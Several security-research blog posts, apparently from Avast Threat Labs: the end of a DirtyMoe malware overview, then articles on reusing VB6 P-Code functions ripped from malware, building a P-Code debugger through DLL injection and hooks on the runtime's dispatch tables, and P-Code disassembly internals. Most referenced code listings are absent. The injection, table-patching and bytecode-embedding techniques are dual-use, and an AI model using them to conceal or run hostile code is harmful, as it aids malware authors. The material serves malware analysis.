Parts of the DirtyMoe malware have been seen throughout the last four years. Most notably, NSFOCUS Technologies described these parts as Nugget Phantom [1]. However, DirtyMoe needs some exploit kit for its deployment. We have clues that PurpleFox [5] and DirtyMoe are related together. The question is still whether PurpleFox and DirtyMoe are different malware groups or whether PurpleFox is being paid to distribute DirtyMoe. Otherwise, both malware families come from the same factory. Both have complex and sophisticated network infrastructures. Hence, malware could be a work of the same group.

The DirtyMoe authors are probably from China. The DirtyMoe service and MOE Modules are written in Delphi. On the other hand, the DirtyMoe driver is written in Microsoft Visual C++. However, the driver is composed of rootkit techniques that are freely accessible on the internet. The authors are not familiar with rootkit writing since the drive code contains many bugs that have been copied from the internet. Moreover, Delphi malicious patterns would be easily detectable, so the authors have been using VMProtect for the code obfuscation.

The incidence of PurpleFox and DirtyMoe has increased in the last year by order of magnitude, and expected occurrence indicates that DirtyMoe is and will be very active. Furthermore, the malware authors seem to be a large and organized group. Therefore, DirtyMoe should be closely monitored.

7. Conclusion

Cryptojacking and DDoS attacks are still popular methods, and our findings indicate that DirtyMoe is still active and on the rise. DirtyMoe is a complex malware that has been designed as a modular system. PurpleFox is one of the most used exploit kits for DirtyMoe deployment. DirtyMoe can execute arbitrary functionality based on a loaded MOE object such as DDoS, etc., meaning that it can basically do anything. In the meantime, the malware aims at crypto-mining. 

The malware implements many self-defense and hiding techniques applied on local, network, and kernel layers. Communication with C&C servers is based on DNS requests and it uses a special mechanism translating DNS results to a real IP address. Therefore, blocking of C&C servers is not an easy task since C&C addresses are different each time and they are not hard-coded. 

Both PurpleFox and DirtyMoe are still active malware and gaining strength. Attacks performed by PurpleFox have significantly increased in 2020. Similarly, the number of DirtyMoe hits also increases since both malware are clearly linked together. We have registered approx. 100k infected computers to date.  In each case, DirtyMoe and Purple Fox are still active in the wild. Furthermore, one MOE object aims to worm into other machines, so PurpleFox and DirtyMoe will certainly increase their activity. Therefore, both should be closely monitored for the time being.

This article summarizes the DirtyMoe malware in point of high-level overview. We described deploying, installation, purpose, communication, self-protecting, and statistics of DirtyMoe in general. The following articles of the DirtyMoe series will aim to give a detailed description of the MSI installer package, DirtyMoe driver, services, MOE objects, and other interesting topics related to the whole DirtyMoe architecture.

References


[1] Nugget Phantom Analysis
[2] Purple Fox Rootkit Now Propagates as a Worm
[3] EternalBlue Still Relevant
[4] Scripting Engine Memory Corruption Vulnerability
[5] Purple Fox malware

The post DirtyMoe: Introduction and General Overview of Modularized Malware appeared first on Avast Threat Labs.

Binary Reuse of VB6 P-Code Functions

19 May 2021 at 10:12

Reusing binary code from malware is one of my favorite topics. Binary re-engineering and being able to bend compiled code to your will is really just an amazing skill. There is also something poetic about taking malware decryption routines and making them serve you.

Over the years this topic has come up again and again. Previous articles have included emit based rips [1], exe to dll conversion [2], emulator based approaches [3], and even converting malware into an IPC based decoder service [4].

The above are all native code manipulations which makes them something you can work with directly. Easy to disassemble, easy to debug, easy to patch. (Easy being a relative term of course :))

Lately I have been working on VB6 P-Code, and developing a P-Code debugger. One goal I had was to find a way to call a P-Code function, ripped from a malware, with my own arguments. It is very powerful to be able to harness existing code without having to recreate it (including all of its nuances.)

Is this even possible with P-Code? As it turns out, it is possible, and I am going to show you how.

The distilled knowledge below is small slice of what was unraveled during an 8 month research project into the VB6 runtime and P-code instruction set.

This paper includes 11 code samples which showcase a wide variety of scenarios utilizing this technique [5].

Note on offsets
In several places throughout this paper there may be VB runtime offsets presented. All offsets are to a reference copy with md5: EEBEB73979D0AD3C74B248EBF1B6E770 [6]. Microsoft was kind enough to publish debug symbols for this build including those for the P-Code engine handlers.

Barriers to entry
The VB6 runtime was designed to load executables, dlls, and ocx controls in an undocumented format. This format contains many complex interlinked structures that layout embedded forms, class structures, dependencies etc. During startup the runtime itself also requires certain initialization steps to occur as it prepares itself for use.

If we wish to execute P-Code buffers out of the context of a VB6 host executable there are several hurdles we must overcome:

VB Runtime Initialization 

Standard runtime initialization for executables takes place through the ThunRTMain export. This is the primary entry point for loading a VB6 executable. This function takes 1 argument that is the address of the top level VB Header structure. This structure contains the full complex hierarchy of everything else within. 

While we can utilize this path for our needs, there are easier ways to go about it. Starting from ThunRTMain can also create some problems on process termination so we will avoid it. 

In 2003 when exploring VB6’s ability to generate standard dlls I found a second path to runtime initialization through the CreateIExprSrvObj export.

This export is simple to call and automatically performs the majority of runtime initialization. Some TLS structure fields however are left out. In testing, most things operate fine. The only errors discovered occur when trying to use native VB file commands, MsgBox or the built in App object.

With a little extra leg work it has been found that the TLS structures can be manually completed to regain access to most of this native functionality. 

Finally if the P-Code buffer creates COM objects, a manual call to CoInitilize must also be performed. 

Replicating basic object structures

Once CreateIExprSrvObj has been executed, we can call into P-Code streams as many times as we want from our loader code. Structure initialization is minimal and only requires the following fields: 

If the P-Code routines utilize global variables then the codeObj.aModulePublic field will also have to be set to a writable block of memory. This has been demonstrated in the globalVar and complex_globals examples. We can even pre-initialize these variables here if we desire. 

In addition to filling out these primary structures, we also have to recreate the constant pool as expected by the specific P-Code. Finally we must also update a structure field in the P-Code to point to our current object Info structure. 

While this may sound complex, there is a generator utility which automatically does all of the work for you in the majority of cases. A more detailed explanation of the following code will be presented in later sections. 

Finding an entrypoint to transition into P-Code execution 

Execution of the VB6 P-Code occurs by calling the ProcCallEngine export of the VB runtime. The stub below is the same mechanism used internally by VB compiled applications to transfer execution between sub functions.

The offset_sub_main argument moved into EDX is the address of the target P-Code functions trailing structure that defines attributes of the function. We will discuss this structure in the following sections. 

The asm stub above shows the default scenario of calling a P-Code function with no arguments. A video showing this running in a debugger is available [7]

In the decrypt_test example we explore how to call a ripped function with a complex prototype and a Variant return value. This example demonstrates reusing an extracted P-Code decoder from a malware executable. Here we can call the extracted P-Code function passing it our own data:

Understanding P-Code function layout 

P-Code functions in compiled executables are linked by a structure that trails the actual byte code. This structure is called RTMI in the VB runtime symbols and the reversing community has taken to it as ProcDscInfo. A partial excerpt of this structure is shown below: 

When we rip a P-Code function from a compiled binary, we must also extract the configured RTMI structure. ProcCallEngine requires this information in order to run a P-Code routine successfully. 

When we relocate the P-Code block outside of the target binary, we must also update the link to our new object Info table.

This is what is being set in the generated code: 

Here the rc4 buffer contains the entire ripped function, starting with the P-Code and then followed by the RTMI structure which starts at offset 0x3e4. We then patch in the address of our manually filled out object Info into the RTMI.pObjTable field. Once this is complete, the P-Code is ready for execution.

Code Generation 

When developing a method such as this, we must start with known quantities. For our purposes we are writing our own test code which is done normally in the VB6 Integrated Development Environment. This code is then extracted using a utility which generates the C or VB6 source necessary to execute it independently.

The generator tool we are using in this paper is the free VBDec [8] P-Code debugger. 

While exploring this technique, the sample code has been optimized to follow several conventions for clarity. For this research all code samples were ripped from functions in a single module. This design was chosen so that all sub function access occurs through the ImpAdCall* opcodes which draw directly against function pointers in the const pool. 

Code taken from instanced form or class compilation units would require support to replicate VTable layouts for the *Vcall opcodes. While this can be done I will leave that as future work for now.

Samples are available that make extensive use of callbacks to integrate tightly with the host code. This is useful for integrating debug output through the C host in a simple manner. 

Callbacks are accessed through the standard VB API Declare syntax which is a core part of the language and is well documented. Below are examples of sending both numeric and string debug info from the P-Code to the host. 

Giving VB direct access to the host functions, is as simple as setting their address in the corresponding constant pool slot. 

Ripping functions with VBDec is simple. Simply right click on the function in the left hand treeview and choose the Rip menu option. VBDec will generate all of the embedding data for you. Multiple functions can be ripped at once by right clicking on the top level module name. 

A corresponding const pool will also be auto-generated along with stubs to update the object Info pointers and asm stubs to call interlinked sub functions.

Once extraction/generation is complete it is left up to the developer to integrate the data into one of the sample frameworks provided.

A spectrum of samples are provided ranging from very simple, to quite complex. Samples include:

Sample Description
firstTest simple addition test
globalVar global variables test
structs passing structs from C to P-Ccode
two_funcs interlink two P-Code functions
ConstPool test decoding a binary const pool entry
lateBinding late bind sapi voice example
earlyBinding early bind sapi voice example
decrypt_test P-Code decryptor w/ complex prototype
Variant Data C host returns variant types from callback to P-Code.
benchmark RC4 benchmarking apps in C/P-Code code and straight C

Understanding the Const Pool 

Each compilation unit such as a module, class, form etc gets its own constant pool which is shared for all of the functions in that file. Pool entries are built up on demand as the file is processed by the compiler from top to bottom.

The constant pool can contain several types of entries such as: 

  • string values (BSTRs specifically) 
  • VB method native call stubs 
  • API import native call stubs 
  • COM GUIDs 
  • COM CLSID / IID pairs held in COMDEF structures 
  • CodeObject base offsets (not applicable to our work here) 
  • internal runtime COM objects filled out at startup (not supported) 

VBDec is capable of automatically deciphering these entries and figuring out what they represent. Once the correct type has been determined, it can generate the C or VB source necessary to fill out the const pool in the host code. The constant pool viewer form allows you to manually view these entries.

In testing it has been performing extremely well outputting complete const pools which require little to no modification. 

For callback integration with the host, if you use “dummy” as the dll name, it will automatically be assumed as a host callback. Otherwise it will be translated literally as a LoadLibrary/GetProcAddress call.

Some const pool entries may show up as Unknown. When you click on a specific entry the raw data at that offset will be loaded into the lower textbox. If this data shows all 00 00 00 00’s then this is a reference to an internal VB runtime COM object that would normally be set to a live instance at initialization.

This has been seen when using the App Object. Normally this would be set @6601802F inside _TipRegAppObject function of the runtime on initialization. These types of entries are not currently supported using this technique (and would not make sense in our context anyways.) 

Interlinked sub functions are supported. A corresponding native stub will be generated along with an entry in the const pool for it. 

Early binding and late binding to COM objects is also supported. Late binding is done entirely through strings in the const pool. For early binding you will seen a COMDEF structure and CLSID / IID data automatically generated.

The following is taken from the early binding sample which loads the Sapi.SpVoice COM object. 

Generation of this code is generally automatic by VBDec but there may be times where the tool can not automatically detect which kind of const pool entry is being specified. In these cases you may have to manually explore the const pool and extract the data yourself.

In the above scenario the file data at the const pool address may look similar to the following:

If we visualize this as a COMDEF structure we can see the values 0, 0x401230, 0x401240, 0. Looking at the file offsets for these virtual addresses we find the GUIDs given above. 

String entries are held as BSTRs, which is a length prefixed unicode string. Since we are in complete control of the const pool, and BSTRs can encapsulate binary data. It is possible to include encrypted strings directly in the const pool using SysAllocStringByteLen. The binary_ConstPool* samples demonstrate this technique. You can also dynamically swap out const pool entries to change functionality as the P-Code runs. An example of this is found in the early bind sample. 

Note: It is important to use the SysAlloc* string functions to get real BSTR’s for const pool entries. As the strings get used by the runtime, it may try to realloc or release them.

Extended TLS Initialization

The VB6 runtime stores several key structures in Thread Local Storage (TLS). Several functions of the runtime require these structures to be initialized. These structures are critical for VB error handling routines and can also come into play for file access functions.

Below is the code for the rtcGetErl export. This function retrieves the user specified error line number associated with the last exception that occurred.

From this snippet of code we can see that the runtime stores the TLS slot value at offset 66110000. Once the actual memory address is retrieved with TlsGetValue The structure field 0x98 is then returned as the stored last error line number. In this manner we can begin to understand the meaning of the various structure offsets.

Even without a full analysis of the complete 0xA8 byte structure we can compare the values seen between a fully initialized process with those initialized through the CreateIExprSrvObj export.

Once diffed 2 main empty slots are observed which normally point to other allocations.

  • field 0x18 – normally set @ 66015B25 in EbSetContextWorkerThread
  • field 0x48 – normally set @ 66018081 in RegAppObjectOfProject

Field 0x48 is used for access to the internal VB App. COM object. This object does not make sense to use in our scenario and does not trigger any exceptions if left blank. If we had to replicate the COM object for compatibility with existing code we could however insert a dummy object.

The allocation at offset 0x18 is only required if we wish to use built in VB file operation commands or the MsgBox function.

If demanded for compatibility with ripped code, It was interesting to see if a manual allocation would allow the runtime to operate properly.

The following code was created to dynamically lookup the TLS slot value, retrieve the tlsEbthread memory offset and then manually link in a new allocation to the missing 0x18 field.

Once the above code was integrated full access was restored to the native VB file access functions. Again this extended initialization is not always required.

Debugging integration’s 

When testing this technique it is best to start with your own code that you control. This way you can get familiar with it and develop a feel for working with (and recognizing) the different function prototypes.

The first step is to write and debug your VB6 code as normal in the VB6 IDE. In preparation for running as a byte buffer, you can then pepper the VB code with progress callbacks to API Declare routines which normally access C dll exports.. You don’t actually have to write the dll, but you can. The calls are identical when hosted internally from a native C loader (or even a VB hosted Addressof callback routine). 

If you are calling into a P-Code function with a specific prototype, this is the trickiest part of the integration. Samples are available which pass in int, structures, references, Variants, bools and byte arrays. You will have to be very aware if arguments are being passed in ByVal, or the default ByRef (pointers).

Also pay attention to the function return types. If no argument/return type is defined, it defaults to a COM Variant. VB functions receive variant return values by pushing an extra empty one onto the stack before calling the function. Simple numeric return values are passed back in EAX as normal.

When interacting with callbacks make sure the callbacks are defined as __stdcall. All of the standard VB6 <–> C development knowledge applies. You can cut your teeth on these rules by working with standard C dlls and debugging in Visual Studio from the dll side while launching a VB6 exe host.

When in doubt you can create simple tests to debug just the function prototypes. For the complex prototype decryptor sample given above, I had the VB6 sub main() code call the rc4 function with expected parameters to test it in its natural environment. I could then debug the VB6 executable to watch the exact stack parameters passed to develop more insight into how to replicate it manually from my C loader.

This can be done with a native debugger by setting a breakpoint @6610664E on the ImpAdCallFPR4 handler in the VB runtime. Here you could examine the stack before entry into the target P-Code function. VBDec’s P-Code debugger is also convenient for this task.

When debugging it is best to have the reference copy of the VB runtime in the same directory as the target executable so that all of your offsets line up with your runtime disassembly with debug symbols. If you use IDA as your debugger, start with the disassembly of the VB runtime and set the target executable in the debugger options. Asm focused debuggers such as Olly or x64dbg are highly recommended over Visual Studio which is primarily based around source code debugging. 

Conclusion:

When working on malware analysis it is a common task to have to interoperate with various types of custom decoding routines. There are multiple approaches to this. One can sit down and reverse engineer the entire routine and make sure your code is 100% compatible, or you can try to explore rip based techniques. 

Ripping decoders is a fairly common task in my personal playbook. While researching the internals of the VB runtime it was a natural inquiry for me to see if the same concept could be applied to P-Code functions. 

With some experimentation, and a suitable generator, this technique has proven stable and relatively easy to implement. These experiments have also deepened my insights into how the various structures are used by the runtime and my appreciation for how tightly VB6 can integrate with C code. 

Hopefully this information will give you a new arrow to add to your quiver, or at least have been an interesting ride. 

[1] Emit based rip
[2] Using an exe as a dll
[3] Running byte blobs in scdbg
[4] Malware IPC decoder service
[5] Code samples
[6] VB6 runtime with symbols
[7] VB6 internals video
[8] VBDec P-Code Debugger

The post Binary Reuse of VB6 P-Code Functions appeared first on Avast Threat Labs.

Writing a VB6 P-Code Debugger

12 May 2021 at 12:46

Background

In this article we are going to discuss how to write a debugger for VB6 P-code. This has been something I have always wanted to do ever since I first saw the WKTVBDE P-Code Debugger written by Mr Silver and Mr Snow back in the early 2000’s

There was something kind of magical about that debugger when I first saw it. It was early in my career, I loved programming in VB6, and reversing it was a mysterious dark art.

While on sabbatical I finally I found the time to sit down and study the topic in depth. I am now sharing what I discovered along the way.

This article will build heavily on the previous paper titled VB P-Code Disassembly[1]. In this paper we detailed how the run time processes P-Code and transfers execution between the different handlers.

It is this execution flow that we will target to gain control with our debugger.

An example of the debugger architecture detailed in this paper can be found in the free vbdec pcode disassembler and debugger

Probing

When I started researching this topic I wanted to first examine what a process running within the WKTVBDE P-Code debugger looked like.

A test P-Code executable was placed alongside a copy of the VB runtime with debug symbols[2]. The executable was launched under WKTVBDE and then a native debugger was attached.

Examining the P-Code function pointer tables at 0x66106D14 revealed all the pointers had been patched to a single function inside the WKTVBDE.dll

This gives us our first hint at how they implemented their debugger. It is also worth noting at this point that the WKTVBDE debugger runs entirely within the process being debugged, GUI and all!

To start the debugger, you run loader.exe and specify your target executable. It will then start the process and inject the WKTVBDE.dll within it. Once loaded WKTVBDE.dll will hook the entire base P-Code handler table with its own function giving it first access to whatever P-Code is about to execute.

The debugger also contains:

  • a P-Code disassembler
  • ability to parse all of the nested VB internal structures
  • ability to list all code objects and control events (like on timer or button click)

This is in addition to the normal debugger UI actions such as data dumping, breakpoint management, stack display etc.

This is A LOT of complex code to run as an injection dll. Debugging all of this would have been quite a lot of work for sure.

With a basic idea of how the debugger operated, I began searching the web to find any other information I could. I was happy to find an old article by Mr Silver on Woodmann that I have mirrored for posterity [3].

In this article Mr Silver lays out the history of their efforts in writing a P-Code debugger and gives a template of the hook function they used. This was a very interesting read and gave me a good place to start.

Design Considerations:

Looking forward there were some design considerations I wanted to change in this architecture.

The first change would be that I would want to move all of the structure parsing, disassembler engine, and user interface code into its own stand alone process. These are complicated tasks and would be very hard to debug as a DLL injection.

To accomplish this task we need an easy to use, stable inter-process communication (IPC) technique that is inherently synchronous. My favorite technique in this category is using Windows Messages which automatically cause the external process to wait until the window procedure has completed before it returns.

I have used this technique extensively to stall malware after it unpacks itself [4]. I have even wired it up to a Javascript engine that interfaces with a remote instance of IDA [5].

This design will give us the opportunity to freely write and debug the file format parsing, disassembly engine, and user interface code completely independent of the debugger core.

At this point debugger integration essentially becomes an add on capability of the disassembler. The injection dll now only has to intercept execution and communicate with the main interface.

For the remainder of this paper we will assume that a fully operational disassembler has already been created and only focus on the debugger specific details.

For discussions on how to implement a disassembler and a reference implementation on structure parsing please refer to the previous paper [1].

Implementation

With sufficient information now in hand it was time to start experimenting with gaining control over the execution flow.

Our first task is figuring out how to hook the P-Code function pointer table. Before we can hook it, we actually need to be able to find it first! This can be accomplished in several ways. From the WKTVBDE authors paper it sounds like they progressed in three main stages. First they started with a manually patched copy of the VB run time and the modified dll referenced in the import table.

Second they then progressed to a single supported copy of the run time with hard coded offsets to patch. A loader now injecting the debugger dll into the target process. Finally they added the ability to dynamically locate and patch the table regardless of run time version.

This is a good experimental progression which they detail in depth. The second stage is readily accessible to anyone who can understand this paper and will work sufficiently well. I will leave the details of injection and hooking as an exercise to the reader.

The basic steps are:

  • set the memory writable
  • copy the original function pointer table
  • replace original handlers with your own hook procedures

The published sample also made use of self modifying code, which we will seek to avoid. To get around this we will introduce individual hook stubs, 1 per table, to record some additional data.

Before we get into the individual hook stubs, we notice they stored some run time/state information in a global structure. We will expand on this with the following:


From the hooking code you will notice that all of the base opcodes in the first table (excluding lead byte handlers) all received the same hook. The Lead_X bytes at the end each received their own procedure.

Below shows samples of the hook handlers for the first two tables. The other 4 follow the same pattern:

The hooks for each individual table configure the global VM structure fields for current lead byte and table base. The real meat of the implementation now starts in the universal hook procedure.


In the main PCodeHookProc you will notice that we call out to another function defined as: void NotifyUI().

It is in this function where we do things like check for breakpoints, handle single stepping etc. This function then uses the synchronous IPC to talk to the out of process debugger user interface.

The debugger UI will receive the step notification and then go into a wait loop until the user gives a step/go/stop command. This has the effect of freezing the debugee until the SendMessage handler returns. You can find a sample implementation of this in the SysAnalyzer ApiLogger source [6].

The reason we call out to another function from PCodeHookProc is because it is written as a naked function in assembler. Once free from this we can now easily implement more complex logic in C.

Further steps:

Once all of the hooks are implemented you still need a way to exercise control over the debuggee. When the code is being remotely frozen, the remote GUI is actually still free to send the frozen process new commands over a separate IPC back channel.

In this manner you can manage breakpoints, change step modes, and implement lookup services through runtime exports such as rtcTypeName.

The hook dll can also patch in custom opcodes. The code below adds our own one byte NOP instruction at unused slot 0x01

As hinted at in the comments, features such as live patching of the current opcode, and “Set New Origin Here” type features are both possible. These are implemented by the debugger doing direct WriteProcessMemory calls to the global VM struct. The address of this structure was disclosed in initialization messages at startup.

Conclusion

Writing a P-Code debugger is a very interesting concept. It is something that I personally wanted to do for the better part of 20 years.

Once you see all the moving parts up close it is not quite as daunting as it may seem at first glance.

Having a working P-Code debugger is also a foundational step to learning how the P-Code instruction set really works. Being able to watch VB6 P-code run live with integrated stack diffing and data viewer tools is very instructive. Single stepping at this level of granularity gives you a much clearer, higher level overview of what is going on.

While the hook code itself is technically challenging, there are substantial tasks required up front just to get you into the game.

Prerequisites for this include:

  • accurate parsing of an undocumented file format
  • a solid disassembly engine for an undocumented P-Code instruction set
  • user interface that allows for easy data display and debugger control

For a reverse engineer, a project such as this is like candy. There are so many aspects to analyze and work on. So many undocumented things to explore. A puzzle with a thousand pieces.

What capabilities can be squeezed out of it? How much more is there to discover?

For me it is a pretty fascinating journey that also brings me closer to the language that I love. Hopefully these articles will inspire others and enable them to explore as well.

[1] – VB P-Code Disassembly
[2] – VB6 runtime with symbols (MD5: EEBEB73979D0AD3C74B248EBF1B6E770)
[3] – VB P-code Information by Mr Silver
[4] – ApiLogger – Breaking into Malware
[5] – IDA JScript
[6] – SysAnalyzer ApiLogger – freeze remote process

The post Writing a VB6 P-Code Debugger appeared first on Avast Threat Labs.

VB6 P-Code Disassembly

5 May 2021 at 05:48

In this article we are going to discuss the inner depths of VB6 P-Code disassembly and the VB6 runtime.

As a malware analyst, VB6 in general, and P-Code in particular, has always been a problem area. It is not well documented and the publicly available tooling did not give me the clarity I really desired.

In several places throughout this paper there may be VB runtime offsets presented. All offsets are to a reference copy with md5: EEBEB73979D0AD3C74B248EBF1B6E770 [1]. Microsoft has been kind enough to provide debug symbols with this version for the .ENGINE P-Code handlers.

To really delve into this topic we are going to have to cover several areas.

The general layout will cover:

  • how the runtime executes a P-Code stream
  • how P-Code handlers are written
  • primer on the P-Code instruction set
  • instruction groupings
  • internal runtime conventions
  • how to debug handlers

Native Opcode Handlers & Code Flow

Let’s start with how a runtime handler interprets the P-Code stream.

While in future articles we will detail how the transition is made from native code to P-Code. For our purposes here, we will look at individual opcode handlers once the P-Code interpretation has already begun.

For our first example, consider the following P-Code disassembly:

Here we can see two byte codes at virtual address 0x401932. These have been decoded to the instruction LitI2_Byte 255. 0xF4 is the opcode byte. 0xFF is the hardcoded argument passed in the byte stream. 

The opcode handler for this instruction is the following:

While in a handler, the ESI register will always start as the virtual address of the next byte to interpret. In the case above, it would be 0x401933 since the 0xF4 byte has already been processed to get us into this handler.

The first instruction at 0x66105CAB will load a single byte from the P-Code byte stream into the EAX register. This value is then pushed onto the stack. This is the functional operation of this opcode.

EAX is then cleared and the next value from the byte stream is loaded into the lower part of EAX (AL). This will be the opcode byte that takes us to the next native handler.

The byte stream pointer is then incremented by two. This will set ESI past the one byte argument, and past the next opcode which has already been consumed.

Finally, the jmp instruction will transfer execution to the next handler by using the opcode as an array index into a function pointer table.

Now that last sentence is a bit of a mouth full, so lets include an example. Below is the first few entries from the _tblByteDisp table. This table is an array of 4 byte function pointers.

Each opcode is an index into this table. The *4 in the jump statement is because each function pointer is 4 bytes (32 bit code).

The only way we know the names of each of these P-Code instructions is because Microsoft included the handler names in the debug symbols for a precious few versions of the runtime. 

The snippet above also reveals several characteristics of the opcode layout to be aware of. First note, there are invalid slots such as opcode 0x01-InvalidExCode. The reason for this is unknown, but it also means we can have some fun with the runtime such as introducing our own opcodes [5]

The second thing to notice is that multiple opcodes can point to the same handlers such as the case with lblEX_Bos. Here we see that opcode 0 leads to the same place as opcode 2. There are actually 5 opcode sequences which point to the BoS (Beginning of Statement) handler.

The next thing to notice is that the opcode names are abbreviated and will require some deciphering to learn how to read them. 

Finally from the LitI2_Byte handler we already analyzed, we can recognize that all of the stubs were hand written in assembler. 

From here, the next question is how many handlers are there? If each opcode is a single byte, there can only be a maximum of 256 handlers right? That would make sense, but is incorrect.

If we look at the last 5 entries in the _tblByteDisp table we find this:

The handler for each of these looks similar to the following:

Here we see EAX zeroed out, the next opcode byte loaded into AL and the byte code pointer (ESI) incremented. Finally it uses that new opcode to jump into an entirely different function pointer table.

This would give us a maximum opcode count of (6*256)-5 or 1531 opcodes.

Now luckily, not all of these opcodes are defined. Remember some slots are invalid, and some are duplicate entries. If we go through and eliminate the noise, we are left with around 822 unique handlers. Still nothing to sneeze at.

So what the above tells us is that not all instructions can be represented as a single opcode. Many instructions will be prefixed with a lead byte that then makes the actual opcode reference a different function pointer table.

Here is a clip from the second tblDispatch pointer table:

To reach lblEX_ImpUI1 we would need to encode 0xFB as the lead byte and 0x01 as the opcode byte.

This would first send execution into the _lblBEX_Lead0 handler, which then loads the 0x01 opcode and uses tblDispatch table to execute lblEX_ImpUI1.

A little bit confusing, but once you see it in action it becomes quite clear. You can watch it run live for yourself by loading a P-Code executable into a native debugger and setting a breakpoint on the lead* handlers.

Byte stream argument length  

Before we can disassemble a byte stream, we also need to know how many byte code arguments each and every instruction takes. With 822 instructions this can be a big job! Luckily other reversers have already done much of the work for us. The first place I saw this table published was from Mr Silver and Mr Snow in the WKTVBDE help file.

A codified version of this can be found in the Semi-VbDecompiler source [2] which I have used as a reference implementation. The opcode sizes are largely correct in this table, however some errors are still present. As with any reversing task, refinement is a process of trial and error. 

Some instructions, 18 known to date, have variable length byte stream arguments. The actual size of the byte stream to consume before the next opcode is embedded as the two bytes after the opcode. An example of this is the FFreeVar instruction.

In this example we see the first two bytes decode as 0x0008 (little endian format), which here represents 4 stack variables to free.

Opcode Naming Conventions

Before we continue on to opcode arguments, I will give a brief word on naming conventions and opcode groupings.

In the opcode names you will often see a combination of the following abbreviations. The below is my current interpretation of the less intuitive specifiers:

Opcode abbreviation Description
Imp Import
Ad Address
St / Ld Store / Load
I2 Integer/Boolean
I4 Long
UI1 Byte
Lit Literal(ie “Hi”,2,8 )
Cy Currency
R4 Single
R8 Double
Str String
Fn Calls a VBA export function
FPR Floating point register
PR Uses ebp-4C as a general register
Var Variant
Rf Reference
VCall VTable call
LateID Late bound COM object call by method ID
LateNamed Late bound COM Object call by method name

Specifiers are often combined to denote meaning and opcodes often come in groups such as the following:

An opcode search interface such as this is very handy while learning the VB6 instruction set.

Opcode Groups

The following shows an example grouping:

Opcode abbreviation Description
ForUI1 Start For loop with byte as counter type
ForI2 With integer counter, default step = 1
ForI4 Long type as counter
ForR4
ForR8
ForCy
ForVar
ForStepUI1 For loop with byte counter, user specified step
ForStepI2
ForStepI4
ForStepR4
ForStepR8
ForStepCy
ForStepVar
ForEachCollVar For each loop over collection using variant
ForEachAryVar For each loop over array using variant
ForEachCollObj For each loop over collection using object type
ForEachCollAd
ForEachVar
ForEachVarFree

A two part series on the intricacies of how For loops were implemented is available [3] for the curious.

As you can see, the opcode set can collapse down fairly well once you take into account the various groupings. While I have grouped the instructions in the source, I do not have an exact number as the lines between them can still be a bit fuzzy. It is probably around 100 distinct operations once grouped.

Now onto the task of argument decodings. I am not sure why, but most P-Code tools only show you the lead byte, opcode byte, mnemonic. Resolved arguments are only displayed if it is fully handled. 

Everything except Semi-VBDecompiler [6] skips the display of the argument bytes.

The problem arises from the fact no tool decodes all of the arguments correctly for all of the opcodes yet. If you do not see the argument byte stream, there is no indication other than a subtle jump in virtual address that anything has been hidden from you. 

Consider the following displays:

The first version shows you opcode and mnemonic only. You don’t even realize anything is missing. The second version gives you a bigger hint and at least shows you no argument resolution is occurring. The third version decodes the byte stream arguments, and resolves the function call to a usable name.

Obviously the third version is the gold standard we should expect from a disassembler. The second version can be acceptable and shows something is missing. The first version leaves you clueless. If you are not already intimately familiar with the instruction set, you will never know you are missing anything.

Common opcode argument types

In the Semi-VbDecompiler source many opcodes are handled with custom printf type specifiers [4]. Common specifiers include:

Format specifier Description
%a Local argument
%l Jump location
%c Proc / global var address stored in constant pool
%e Pool index as P-Code proc to call
%x Pool index to locate external API call
%s Pool index of string address
%1/2/4 Literal byte, int, or long value
%t Code object from its base offset
%v VTable call
%} End of procedure

Many opcodes only take one or more simple arguments, %a and %s being the most common.

Consider "LitVarStr %a %s" which loads a variant with a literal BSTR string, and then pushes that address to the top of the stack:

The %a decoder will read the first two bytes from the stream and decode it as follows:

Interpreting 0xFF68 as a signed 2 byte number is -0x98. Since it is a negative value, it is a local function variable at ebp-0x98. Positive values denote function arguments. 

Next the %s handler will read the next two bytes which it interprets as a pool index. The value at pool index 0 is the constant 0x40122C. This address contains an embedded BSTR where the address points to the unicode part of the string, and the preceding 4 bytes denoting its length.

A closer look at run time data for this instruction is included in the debugging section later on.

Another common specifier is the %l handler used for jump calculations. It  can be seen in the following examples:

In the first unconditional jump the byte stream argument is 0x002C. Jump locations are all referenced from the function start address, not the current instruction address as may be expected. 

0x4014E4 + 0x2C = 0x401510 
0x4014E4 + 0x3A = 0x40151E

Since all jumps are calculated from the beginning of a function, the offsets in the byte stream must be interpreted as unsigned values. Jumps to addresses before the function start are not possible and represent a disassembly error. 

Next lets consider the %x handler as we revisit the "ImpAdCallFPR4 %x" instruction:

The native handler for this is:

Looking at the P-Code disassembly we can see the byte stream of 24001000 is actually two integer values. The first 0x0024 is a constant pool index, and the second 0x0010 is the expected stack adjustment to verify after the call. 

Now we haven’t yet talked about the constant pool or the house keeping area of the stack that VB6 reserves for state storage. For an abbreviated description, at runtime VB uses the area between ebp and ebp-94h as kind of a scratch pad. The meaning of all of these fields are not yet fully known however several of the key entries are as follows:

Stack position Description
ebp-58 Current function start address
ebp-54 Constant pool
ebp-50 Current function raw address (RTMI structure)
ebp-4C PR (Pointer Register) used for Object references

In the above disassembly we can see entry 0x24 from the constant pool would be loaded.

A constant pool viewer is a very instructive tool to help decipher these argument byte codes.

It has been found that smart decoding routines can reliably decipher constant pool data independent of analysis of the actual disassembly.

One such implementation is shown below:

If we look at entry 0x0024 we see it holds the value 0x4011CE. If we look at this  address in IDA we find the following native disassembly:

0x40110C is the IAT address of msvbvm60.rtcImmediateIf import. This opcode is how VB runtime imports are called. 

While beyond the scope of this paper, it is of interest to note that VB6 embeds a series of small native stubs in P-Code executables to splice together the native and P-Code executions. This is done for API calls, call backs, inter-modular calls etc. 

The Constant Pool

The constant pool itself is worth a bit of discussion. Each compilation unit such as a module, class, form etc gets its own constant pool which is shared for all of the functions in that file. 

Pool entries are built up on demand as the file is processed by the compiler from top to bottom. 

The constant pool can contain several types of entries such as: 

  • string values (BSTRs specifically) 
  • VB method native call stubs 
  • API import native call stubs 
  • COM GUIDs 
  • COM CLSID / IID pairs held in COMDEF structures 
  • CodeObject base offsets
  • blank slots which represent internal COM objects filled out at startup by the runtime (ex: App.)

More advanced opcode processors

More complex argument resolutions require a series of opcode post processors.  In the disassembly engine I am working on there are currently 13 post processors which handle around 30 more involved opcodes.

Things start to get much more complex when we deal with COM object calls. Here we have to resolve the COM class ID, interface ID, and discern its complete VTable layout to determine which method is going to be called. This requires access to the COM objects type library if its an external type, and the ability to recreate its function prototype from that information.

